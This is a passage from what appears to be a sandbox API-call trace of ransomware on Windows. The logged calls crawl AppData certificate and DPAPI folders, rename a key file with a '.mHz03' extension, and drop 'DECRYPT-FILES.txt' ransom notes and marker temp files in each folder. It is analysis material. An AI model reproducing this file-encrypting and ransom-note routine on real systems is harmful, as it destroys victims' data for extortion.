lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.052] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 106 [0088.052] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.mHz03") returned 112 [0088.052] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.mHz03" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.mhz03"), dwFlags=0x0) returned 1 [0088.052] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.053] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.053] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.053] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0088.053] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.053] CloseHandle (hObject=0x440) returned 1 [0088.053] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500\\", cAlternateFileName="S-1-5-~1")) returned 0 [0088.053] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0088.053] CloseHandle (hObject=0x438) returned 1 [0088.053] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0088.054] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0088.054] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0088.054] lstrcatW (in: lpString1="SystemCertificates", lpString2="\\" | out: lpString1="SystemCertificates\\") returned="SystemCertificates\\" [0088.054] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0088.054] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\jkbimi8.tmp") returned 74 [0088.054] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0088.054] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 62 [0088.054] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.054] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt") returned 80 [0088.054] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0088.055] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0088.055] CloseHandle (hObject=0x43c) returned 1 [0088.056] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 62 [0088.056] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0088.056] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0088.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.056] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.056] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.056] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.056] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ad9ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.056] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0088.056] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\jkbimi8.tmp" [0088.056] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.056] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.056] CloseHandle (hObject=0x0) returned 0 [0088.057] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.057] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0088.057] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0088.057] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0088.057] lstrcatW (in: lpString1="My", lpString2="\\" | out: lpString1="My\\") returned="My\\" [0088.057] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0088.057] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\jkbimi8.tmp") returned 77 [0088.057] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.058] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 65 [0088.058] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.058] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt") returned 83 [0088.058] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.060] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.061] CloseHandle (hObject=0x444) returned 1 [0088.061] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 65 [0088.061] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0088.061] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.061] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.061] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.061] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.061] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.061] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0088.061] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0088.061] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0088.061] lstrcatW (in: lpString1="Certificates", lpString2="\\" | out: lpString1="Certificates\\") returned="Certificates\\" [0088.061] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0088.061] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\jkbimi8.tmp") returned 90 [0088.061] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.062] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 78 [0088.062] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.062] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt") returned 96 [0088.063] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.063] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.066] CloseHandle (hObject=0x44c) returned 1 [0088.066] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 78 [0088.067] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0088.067] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.067] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.067] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.067] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.067] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.067] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.067] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0088.067] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\jkbimi8.tmp" [0088.067] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.067] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.067] CloseHandle (hObject=0x0) returned 0 [0088.067] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.068] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.068] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.068] CloseHandle (hObject=0x448) returned 1 [0088.068] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0088.068] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0088.068] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0088.068] lstrcatW (in: lpString1="CRLs", lpString2="\\" | out: lpString1="CRLs\\") returned="CRLs\\" [0088.068] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CRLs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0088.068] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\jkbimi8.tmp") returned 82 [0088.068] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.068] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 70 [0088.069] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.069] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt") returned 88 [0088.069] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.069] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.070] CloseHandle (hObject=0x44c) returned 1 [0088.070] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 70 [0088.070] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0088.070] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.070] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.070] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, 